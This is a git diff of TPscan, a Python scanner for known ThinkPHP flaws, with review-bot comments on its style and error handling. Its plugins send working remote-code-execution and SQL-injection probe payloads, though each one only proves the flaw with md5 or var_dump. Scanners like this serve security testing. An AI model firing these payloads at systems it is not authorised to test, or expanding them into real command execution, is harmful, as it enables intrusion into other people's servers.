diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..fcc02f4 --- /dev/null +++ b/.gitignore @@ -0,0 +1,2 @@ +.idea +*__pycache__ \ No newline at end of file diff --git a/README.md b/README.md index 5d98ee0..817fd78 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,4 @@ # TPscan 一键ThinkPHP漏洞检测,基于Python3 + +![](https://raw.githubusercontent.com/pfinal-nc/iGallery/master/blog/202311011758502.png) \ No newline at end of file diff --git a/TPscan.py b/TPscan.py index 8bee688..30f214f 100644 --- a/TPscan.py +++ b/TPscan.py @@ -1,7 +1,10 @@ #!/usr/bin/env python # coding=utf-8 -from gevent import monkey;monkey.patch_all() +from gevent import monkey; + +monkey.patch_all() from gevent.pool import Pool +from termcolor import colored from plugins.thinkphp_checkcode_time_sqli import thinkphp_checkcode_time_sqli_verify from plugins.thinkphp_construct_code_exec import thinkphp_construct_code_exec_verify from plugins.thinkphp_construct_debug_rce import thinkphp_construct_debug_rce_verify @@ -19,6 +22,7 @@ import sys import gevent + print(''' ___________ |_ _| ___ \ @@ -29,7 +33,8 @@ code by Lucifer ''') targeturl = input("[*]Give me a target: ") -if targeturl.find('http') == -1: +if targeturl.find('http') == -1 and targeturl.find('https') == -1: + print(colored("\n[*]Please input a valid url!", "red")) exit(1) poclist = [ 'thinkphp_checkcode_time_sqli_verify("{0}")'.format(targeturl), @@ -48,10 +53,12 @@ 'thinkphp_view_recent_xff_sqli_verify("{0}")'.format(targeturl), ] + def pocexec(pocstr): exec(pocstr) gevent.sleep(0) + pool = Pool(10) threads = [pool.spawn(pocexec, item) for item in poclist] -gevent.joinall(threads) \ No newline at end of file +gevent.joinall(threads) diff --git a/img.png b/img.png new file mode 100644 index 0000000..e69de29 diff --git a/plugins/thinkphp_checkcode_time_sqli.py b/plugins/thinkphp_checkcode_time_sqli.py index 8c243eb..65b7cc5 100644 --- a/plugins/thinkphp_checkcode_time_sqli.py +++ b/plugins/thinkphp_checkcode_time_sqli.py 
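Review bot: The split import in the first TPscan.py hunk leaves a stray semicolon, `from gevent import monkey;`, which should be plain `from gevent import monkey`. The same hunk makes `termcolor` a hard third-party dependency of TPscan.py and every plugin, yet no requirements or install file is changed in this diff. If the project keeps one, it needs the new entry, otherwise the scanner fails at import time on a fresh checkout.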
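Review bot: The new condition `targeturl.find('http') == -1 and targeturl.find('https') == -1` in the `@@ -29,7 +33,8 @@` hunk is no stricter than the old one, because any string containing `https` also contains `http`. It also accepts `http` anywhere in the input, so a value such as `example.com/http` passes even though it has no scheme. Checking the prefix states the intent: `if not targeturl.startswith(("http://", "https://")):`.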
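Review bot: `pocexec` in the last TPscan.py hunk still runs `exec(pocstr)` on source text built with `'..._verify("{0}")'.format(targeturl)`, and this commit only reformats around it. A target value containing a double quote ends the string literal, and the rest is evaluated as Python on the scanning host. That matters as soon as targets come from a file or another tool rather than the operator's keyboard. Storing the callables avoids building code from input: `poclist = [thinkphp_checkcode_time_sqli_verify, ...]` and `threads = [pool.spawn(poc, targeturl) for poc in poclist]`. The `poclist` definition begins in the previous hunk and is only partly visible here.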
@@ -2,22 +2,28 @@ # coding=utf-8 import time import urllib + import requests import urllib3 +from termcolor import colored + urllib3.disable_warnings() + def thinkphp_checkcode_time_sqli_verify(url): + """thinkphp_checkcode_time_sqli_verify""" + pocdict = { - "vulnname":"thinkphp_checkcode_time_sqli", + "vulnname": "thinkphp_checkcode_time_sqli", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : "TPscan", + "User-Agent": "TPscan", "DNT": "1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Content-Type": "multipart/form-data; boundary=--------641902708", @@ -34,8 +40,11 @@ def thinkphp_checkcode_time_sqli_verify(url): pocdict['vulnurl'] = vurl pocdict['payload'] = payload pocdict['proof'] = 'time sleep 15' - pocdict['response'] = req.text - print(pocdict) - - except: + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_checkcode_time_sqli 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_checkcode_time_sqli 漏洞", "red")) + except Exception as e: + print(colored("\n[*] 目标不存在 thinkphp_checkcode_time_sqli 漏洞", "red")) pass diff --git a/plugins/thinkphp_construct_code_exec.py b/plugins/thinkphp_construct_code_exec.py index 31d2e02..2bb5c19 100644 --- a/plugins/thinkphp_construct_code_exec.py +++ b/plugins/thinkphp_construct_code_exec.py 
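Review bot: The added docstring `"""thinkphp_checkcode_time_sqli_verify"""` only repeats the function name and tells a reader nothing about what is checked or reported. A one-line summary would help, for example `"""Probe url for the ThinkPHP checkcode time-based SQL injection and print the verdict."""`, with a note that the result is printed and not returned. The same name-only docstring is added in the first hunk of every other plugin in this commit. The function body continues outside this hunk.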
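Review bot: The new `except Exception as e:` branch prints the same "target is not vulnerable" line as the `else:` branch, so a timeout, DNS failure or refused connection is reported as a clean result. `e` is never used, the trailing `pass` is dead, and the dict's `exception` key stays empty. An inconclusive check should be distinguishable from a negative one: use `except requests.RequestException as e:`, set `pocdict['exception'] = str(e)`, and print a separate "check could not be completed" message. The same pattern is added with a bare `except:` in the construct_debug_rce, debug_index_ids_sqli, driver_display_rce, index_construct_rce, lite_code_exec, method_filter_code_exec, multi_sql_leak, pay_orderid_sqli, request_input_rce and view_recent_xff_sqli hunks. The construct_code_exec and index_showid_rce hunks keep a silent `except: pass`, so a failed request there prints no verdict at all.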
@@ -3,26 +3,30 @@ import urllib import requests import urllib3 +from termcolor import colored + urllib3.disable_warnings() + def thinkphp_construct_code_exec_verify(url): + """thinkphp_construct_code_exec_verify""" pocdict = { - "vulnname":"thinkphp_construct_code_exec", + "vulnname": "thinkphp_construct_code_exec", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : "TPscan", + "User-Agent": "TPscan", } payload = { - '_method':'__construct', - 'filter[]':'var_dump', - 'method':'get', - 'server[REQUEST_METHOD]':'f7e0b956540676a129760a3eae309294', + '_method': '__construct', + 'filter[]': 'var_dump', + 'method': 'get', + 'server[REQUEST_METHOD]': 'f7e0b956540676a129760a3eae309294', } try: vurl = urllib.parse.urljoin(url, 'index.php?s=captcha') @@ -32,8 +36,10 @@ def thinkphp_construct_code_exec_verify(url): pocdict['vulnurl'] = vurl pocdict['payload'] = payload pocdict['proof'] = '56540676a129760a3ea' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_construct_code_exec 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_construct_code_exec 漏洞", "red")) except: pass diff --git a/plugins/thinkphp_construct_debug_rce.py b/plugins/thinkphp_construct_debug_rce.py index 28c5be5..0cb4488 100644 --- a/plugins/thinkphp_construct_debug_rce.py +++ b/plugins/thinkphp_construct_debug_rce.py 
@@ -3,25 +3,29 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_construct_debug_rce_verify(url): + """thinkphp_construct_debug_rce_verify""" pocdict = { - "vulnname":"thinkphp_construct_debug_rce", + "vulnname": "thinkphp_construct_debug_rce", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : "TPscan", + "User-Agent": "TPscan", } payload = { - '_method':'__construct', - 'filter[]':'var_dump', - 'server[REQUEST_METHOD]':'f7e0b956540676a129760a3eae309294', + '_method': '__construct', + 'filter[]': 'var_dump', + 'server[REQUEST_METHOD]': 'f7e0b956540676a129760a3eae309294', } try: vurl = urllib.parse.urljoin(url, 'index.php') @@ -31,8 +35,11 @@ def thinkphp_construct_debug_rce_verify(url): pocdict['vulnurl'] = vurl pocdict['payload'] = payload pocdict['proof'] = '56540676a129760a3' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_construct_debug_rce 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_construct_debug_rce 漏洞", "red")) except: + print(colored("\n[*] 目标不存在 thinkphp_construct_debug_rce 漏洞", "red")) pass diff --git a/plugins/thinkphp_debug_index_ids_sqli.py b/plugins/thinkphp_debug_index_ids_sqli.py index f094a3a..4724a76 100644 --- a/plugins/thinkphp_debug_index_ids_sqli.py +++ b/plugins/thinkphp_debug_index_ids_sqli.py 
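Review bot: `from termcolor import colored` is added after the executable statement `urllib3.disable_warnings()` in this import hunk, which puts a module-level import below code (PEP 8 / E402). It is also inconsistent with the checkcode_time_sqli, construct_code_exec, invoke_func_code_exec, lite_code_exec and method_filter_code_exec plugins, where the import comes first. Move the import up next to `import urllib3` and keep `urllib3.disable_warnings()` as the last line of the header. The same ordering appears in the debug_index_ids_sqli, driver_display_rce, index_construct_rce, index_showid_rce, multi_sql_leak, pay_orderid_sqli, request_input_rce and view_recent_xff_sqli import hunks.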
@@ -3,20 +3,24 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_debug_index_ids_sqli_verify(url): + """thinkphp_debug_index_ids_sqli_verify""" pocdict = { - "vulnname":"thinkphp_debug_index_ids_sqli", + "vulnname": "thinkphp_debug_index_ids_sqli", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : "TPscan", + "User-Agent": "TPscan", } payload = 'index.php?ids[0,UpdAtexml(0,ConcAt(0xa,Md5(2333)),0)]=1' try: @@ -26,8 +30,11 @@ def thinkphp_debug_index_ids_sqli_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_debug_index_ids_sqli 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_debug_index_ids_sqli 漏洞", "red")) except: + print(colored("\n[*] 目标不存在 thinkphp_debug_index_ids_sqli 漏洞", "red")) pass diff --git a/plugins/thinkphp_driver_display_rce.py b/plugins/thinkphp_driver_display_rce.py index 1821061..79f0c5f 100644 --- a/plugins/thinkphp_driver_display_rce.py +++ b/plugins/thinkphp_driver_display_rce.py 
@@ -3,20 +3,24 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_driver_display_rce_verify(url): + """thinkphp_driver_display_rce_verify""" pocdict = { - "vulnname":"thinkphp_driver_display_rce", + "vulnname": "thinkphp_driver_display_rce", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } try: vurl = urllib.parse.urljoin(url, 'index.php?s=index/\\think\\view\driver\Php/display&content=%3C?php%20var_dump(md5(2333));?%3E') @@ -25,8 +29,11 @@ def thinkphp_driver_display_rce_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760a' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_driver_display_rce 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_driver_display_rce 漏洞", "red")) except: + print(colored("\n[*] 目标不存在 thinkphp_driver_display_rce 漏洞", "red")) pass diff --git a/plugins/thinkphp_index_construct_rce.py b/plugins/thinkphp_index_construct_rce.py index 3b1a543..1ba3a10 100644 --- a/plugins/thinkphp_index_construct_rce.py +++ b/plugins/thinkphp_index_construct_rce.py @@ -3,17 +3,21 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_index_construct_rce_verify(url): + """thinkphp_index_construct_rce_verify""" pocdict = { - "vulnname":"thinkphp_index_construct_rce", + "vulnname": "thinkphp_index_construct_rce", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { "User-Agent": 'TPscan', 
@@ -28,9 +32,11 @@ def thinkphp_index_construct_rce_verify(url): pocdict['vulnurl'] = vurl pocdict['payload'] = payload pocdict['proof'] = '56540676a129760a3ea' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_index_construct_rce 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_index_construct_rce 漏洞", "red")) except: + print(colored("\n[*] 目标不存在 thinkphp_index_construct_rce 漏洞", "red")) pass - diff --git a/plugins/thinkphp_index_showid_rce.py b/plugins/thinkphp_index_showid_rce.py index 97a5933..15d75a6 100644 --- a/plugins/thinkphp_index_showid_rce.py +++ b/plugins/thinkphp_index_showid_rce.py @@ -4,20 +4,24 @@ import datetime import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_index_showid_rce_verify(url): + """thinkphp_index_showid_rce_verify""" pocdict = { - "vulnname":"thinkphp_index_showid_rce", + "vulnname": "thinkphp_index_showid_rce", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } try: vurl = urllib.parse.urljoin(url, 'index.php?s=my-show-id-\\x5C..\\x5CTpl\\x5C8edy\\x5CHome\\x5Cmy_1{~var_dump(md5(2333))}]') @@ -29,8 +33,10 @@ def thinkphp_index_showid_rce_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760a3 found' - pocdict['response'] = req2.text - print(pocdict) - + pocdict['response'] = req2.status_code + print(colored("[+] 目标存在 thinkphp_index_showid_rce 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_index_showid_rce", "red")) except: pass 
diff --git a/plugins/thinkphp_invoke_func_code_exec.py b/plugins/thinkphp_invoke_func_code_exec.py index b634f3a..1b64fb4 100644 --- a/plugins/thinkphp_invoke_func_code_exec.py +++ b/plugins/thinkphp_invoke_func_code_exec.py @@ -4,20 +4,24 @@ import urllib import requests import urllib3 +from termcolor import colored + urllib3.disable_warnings() + def thinkphp_invoke_func_code_exec_verify(url): + """thinkphp_invoke_func_code_exec_verify""" pocdict = { - "vulnname":"thinkphp_invoke_func_code_exec", + "vulnname": "thinkphp_invoke_func_code_exec", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } controllers = list() req = requests.get(url, headers=headers, timeout=15, verify=False) @@ -27,6 +31,7 @@ def thinkphp_invoke_func_code_exec_verify(url): controllers.append(match.split('/')[1]) controllers.append('index') controllers = list(set(controllers)) + status = 0 for controller in controllers: try: payload = 'index.php?s={0}/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=2333'.format(controller) @@ -36,8 +41,11 @@ def thinkphp_invoke_func_code_exec_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760a3' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_invoke_func_code_exec 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + status = 1 except: pass + if status == 0: + print(colored("\n[*] 目标不存在 thinkphp_invoke_func_code_exec 漏洞", "red")) diff --git a/plugins/thinkphp_lite_code_exec.py b/plugins/thinkphp_lite_code_exec.py index 80a3096..6534893 100644 --- a/plugins/thinkphp_lite_code_exec.py +++ b/plugins/thinkphp_lite_code_exec.py 
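Review bot: The new integer flag `status` in the invoke_func_code_exec hunks duplicates `pocdict['isvul']`, which is already set to `True` on a hit, so the final check can be `if not pocdict['isvul']:` with no extra variable. Because the loop body keeps `except: pass`, the "not vulnerable" line is also printed when every request in the loop failed, so it does not separate a negative result from an incomplete one. The initial `requests.get(url, ...)` in the first hunk appears to sit outside any `try` (the function is only partly visible), in which case a connection error there would end the greenlet without any output for this check. The multi_sql_leak hunk adds the same flag as `status = 0;` with a stray semicolon.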
@@ -3,20 +3,24 @@ import urllib import requests import urllib3 +from termcolor import colored + urllib3.disable_warnings() + def thinkphp_lite_code_exec_verify(url): + """thinkphp_lite_code_exec_verify""" pocdict = { - "vulnname":"thinkphp_lite_code_exec", + "vulnname": "thinkphp_lite_code_exec", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } try: payload = 'index.php/module/action/param1/$%7B@print%28md5%282333%29%29%7D' @@ -26,8 +30,11 @@ def thinkphp_lite_code_exec_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760a3' - pocdict['response'] = req.text - print(pocdict) + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_lite_code_exec 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_lite_code_exec 漏洞", "red")) except: - pass + print(colored("\n[*] 目标不存在 thinkphp_lite_code_exec 漏洞", "red")) diff --git a/plugins/thinkphp_method_filter_code_exec.py b/plugins/thinkphp_method_filter_code_exec.py index c87a47d..783ca90 100644 --- a/plugins/thinkphp_method_filter_code_exec.py +++ b/plugins/thinkphp_method_filter_code_exec.py 
@@ -3,25 +3,29 @@ import urllib import requests import urllib3 +from termcolor import colored + urllib3.disable_warnings() + def thinkphp_method_filter_code_exec_verify(url): + """ thinkphp_method_filter_code_exec_verify """ pocdict = { - "vulnname":"thinkphp_method_filter_code_exec", + "vulnname": "thinkphp_method_filter_code_exec", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } payload = { - 'c':'var_dump', - 'f':'f7e0b956540676a129760a3eae309294', - '_method':'filter', + 'c': 'var_dump', + 'f': 'f7e0b956540676a129760a3eae309294', + '_method': 'filter', } try: vurl = urllib.parse.urljoin(url, 'index.php') @@ -31,8 +35,10 @@ def thinkphp_method_filter_code_exec_verify(url): pocdict['vulnurl'] = vurl pocdict['payload'] = payload pocdict['proof'] = '56540676a129760a3ea' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_method_filter_code_exec 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_method_filter_code_exec 漏洞", "red")) except: - pass + print(colored("\n[*] 目标不存在 thinkphp_method_filter_code_exec 漏洞", "red")) diff --git a/plugins/thinkphp_multi_sql_leak.py b/plugins/thinkphp_multi_sql_leak.py index ca6b7b1..1774d4f 100644 --- a/plugins/thinkphp_multi_sql_leak.py +++ b/plugins/thinkphp_multi_sql_leak.py 
@@ -3,20 +3,24 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_multi_sql_leak_verify(url): + """ thinkphp_multi_sql_leak_verify""" pocdict = { - "vulnname":"thinkphp_multi_sql_leak", + "vulnname": "thinkphp_multi_sql_leak", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } payloads = [ r'index.php?s=/home/shopcart/getPricetotal/tag/1%27', @@ -29,6 +33,7 @@ def thinkphp_multi_sql_leak_verify(url): r'index.php?s=/home/order/cancel/id/1%27', ] try: + status = 0; for payload in payloads: vurl = urllib.parse.urljoin(url, payload) req = requests.get(vurl, headers=headers, timeout=15, verify=False) @@ -36,9 +41,12 @@ def thinkphp_multi_sql_leak_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = 'SQL syntax found' - pocdict['response'] = req.text - print(pocdict) + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_multi_sql_leak 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + status = 1 break - + if status == 0: + print(colored("\n[*] 目标不存在 thinkphp_multi_sql_leak 漏洞", "red")) except: - pass + print(colored("\n[*] 目标不存在 thinkphp_multi_sql_leak 漏洞", "red")) diff --git a/plugins/thinkphp_pay_orderid_sqli.py b/plugins/thinkphp_pay_orderid_sqli.py index c82080c..860833b 100644 --- a/plugins/thinkphp_pay_orderid_sqli.py +++ b/plugins/thinkphp_pay_orderid_sqli.py 
@@ -3,20 +3,24 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_pay_orderid_sqli_verify(url): + """thinkphp_pay_orderid_sqli_verify""" pocdict = { - "vulnname":"thinkphp_pay_orderid_sqli", + "vulnname": "thinkphp_pay_orderid_sqli", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } try: vurl = urllib.parse.urljoin(url, 'index.php?s=/home/pay/index/orderid/1%27)UnIoN/**/All/**/SeLeCT/**/Md5(2333)--+') @@ -25,8 +29,10 @@ def thinkphp_pay_orderid_sqli_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760a' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_pay_orderid_sqli 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_pay_orderid_sqli 漏洞", "red")) except: - pass + print(colored("\n[*] 目标不存在 thinkphp_pay_orderid_sqli 漏洞", "red")) diff --git a/plugins/thinkphp_request_input_rce.py b/plugins/thinkphp_request_input_rce.py index a466896..e51abb0 100644 --- a/plugins/thinkphp_request_input_rce.py +++ b/plugins/thinkphp_request_input_rce.py 
@@ -3,20 +3,24 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_request_input_rce_verify(url): + """thinkphp_request_input_rce_verify""" pocdict = { - "vulnname":"thinkphp_request_input_rce", + "vulnname": "thinkphp_request_input_rce", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } try: vurl = urllib.parse.urljoin(url, 'index.php?s=index/\\think\Request/input&filter=var_dump&data=f7e0b956540676a129760a3eae309294') @@ -25,8 +29,10 @@ def thinkphp_request_input_rce_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760a3ea' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_request_input_rce漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_request_input_rce漏洞", "red")) except: - pass + print(colored("\n[*] 目标不存在 thinkphp_request_input_rce漏洞", "red")) diff --git a/plugins/thinkphp_view_recent_xff_sqli.py b/plugins/thinkphp_view_recent_xff_sqli.py index 689474e..ca9d7ef 100644 --- a/plugins/thinkphp_view_recent_xff_sqli.py +++ b/plugins/thinkphp_view_recent_xff_sqli.py 
@@ -3,21 +3,25 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_view_recent_xff_sqli_verify(url): + """ thinkphp_view_recent_xff_sqli_verify """ pocdict = { - "vulnname":"thinkphp_view_recent_xff_sqli", + "vulnname": "thinkphp_view_recent_xff_sqli", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', - "X-Forwarded-For" : "1')And/**/ExtractValue(1,ConCat(0x5c,(sElEct/**/Md5(2333))))#" + "User-Agent": 'TPscan', + "X-Forwarded-For": "1')And/**/ExtractValue(1,ConCat(0x5c,(sElEct/**/Md5(2333))))#" } try: vurl = urllib.parse.urljoin(url, 'index.php?s=/home/article/view_recent/name/1') @@ -26,8 +30,10 @@ def thinkphp_view_recent_xff_sqli_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760a' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_view_recent_xff_sqli\tpayload: ", "green")) + print(colored(pocdict, "green")) + else: + print(colored("\n[*] 目标不存在 thinkphp_view_recent_xff_sqli", "red")) except: - pass \ No newline at end of file + print(colored("\n[*] 目标不存在 thinkphp_view_recent_xff_sqli", "red"))